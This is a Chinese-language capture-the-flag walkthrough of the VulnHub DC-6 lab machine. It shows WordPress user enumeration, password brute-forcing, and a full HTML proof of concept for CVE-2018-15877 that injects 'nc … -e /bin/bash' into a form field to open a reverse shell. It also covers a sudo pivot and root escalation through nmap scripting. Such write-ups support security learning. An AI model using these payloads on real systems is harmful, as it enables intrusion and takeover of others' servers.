VulnHub通关日记-DC_6-Walkthrough
靶机介绍
好的,这并不是一个真正的线索,但是对于那些只是想继续工作的人,更多的是“我们不想花五年时间等待某个过程完成”的建议。
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
那应该节省您几年。;-)
运用的知识
wpsacn
爆破网站用户密码 wordpress
后台Activity monitor
插件命令注入
获取shellnmap
提权获取root
信息搜集
拿到IP
后对它进行扫描端口开放服务:
nmap -A -T4 192.168.1.145
nmap扫描
扫描出来后发现它开放了80
(http),22
(ssh),紧接着访问http://192.168.1.145
发现它重定向到了这个URL:wordy
扫描结果
然后我设置了一下hosts
文件:
设置主机文件
设置好之后打开http://wordy
发现它的CMS是Wordpress
:
判断cms
wpscan爆破网站用户密码
的英文既然wordpress
那么我就先用wpscan
来对它进行扫描把:
wpscan --url http://wordy/ -e u
wpscan爆破
扫描出来后发现它有这些用户:
adminjensgrahammarksarah
紧接着我又生成了一些字典文件来对它网站进行爆破:
cat /usr/share/wordlists/rockyou.txt | grep k01# 这是作者给我们的提示!
生成完字典后对它的网站用户名挨个爆破枚举,看看能不能捡漏:
wpscan --url http://wordy/ -U user -P passwords.txt
用户名枚举
爆破成功后得到mark
的密码:
Username: mark, Password: helpdesk01
随后我用得到的账号和密码登陆到了网站的后台发现了一个插件:Activity monitor
发现插件活动监视器
活动监视器插件命令注入获取shell
看到这个插件我去搜索了一下发现有一个命令注入
:
命令注入
PoC: --> <html> <!-- Wordpress Plainview Activity Monitor RCE [+] Version: 20161228 and possibly prior [+] Description: Combine OS Commanding and CSRF to get reverse shell [+] Author: LydA(c)ric LEFEBVRE [+] CVE-ID: CVE-2018-15877 [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well --> <body> <script>history.pushState('', '', '/')</script> <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ip" value="google.fr| nc 192.168.1.128 9999 -e /bin/bash" /> <input type="hidden" name="lookup" value="Lookup" /> <input type="submit" value="Submit request" /> </form> </body> </html>
插入有效载荷
设置好之后KALI用nc
监听6666
端口,访问得到poc.html
一枚shell
:
访问
GetShell
先让他得到一个bash
外壳把:
python -c 'import pty;pty.spawn("/bin/bash")'
python的bash外壳
通过信息搜集我发现mark
目录下有一个文件,里面预定了graham
的密码:
Things to do: - Restore full functionality for the hyperdrive (need to speak to Jens)- Buy present for Sarah's farewell party- Add new user: graham - GSo7isUM1D4 - done- Apply for the OSCP course- Buy new laptop for Sarah's replacement
graham密码
拿到密码后我ssh
登陆到了graham
:
登录graham
sudo切换到jens用户
登陆成功后我习惯性的sudo -l
发现graham
用户可以以jens
的身份去运行/home/jens/backups.sh
文件:
查看backups.sh
文件后发现它是一个解压的命令,然后我以jens
身份去运行这个文件成功切换到了jens
:
sudo -u jens /home/jens/backups.sh
切换到jens用户
nmap提权
成功来到jens
用户后我又是习惯性的sudo -l
发现它可以以root
身份去运行/usr/bin/nmap
:
nmap提权1
最后也是用nmap
提权为root
用户:
TF=$(mktemp)echo 'os.execute("/bin/sh")' > $TFsudo nmap --script=$TF
nmap提权2
最终也是在/root
目录下拿到了Flag
〜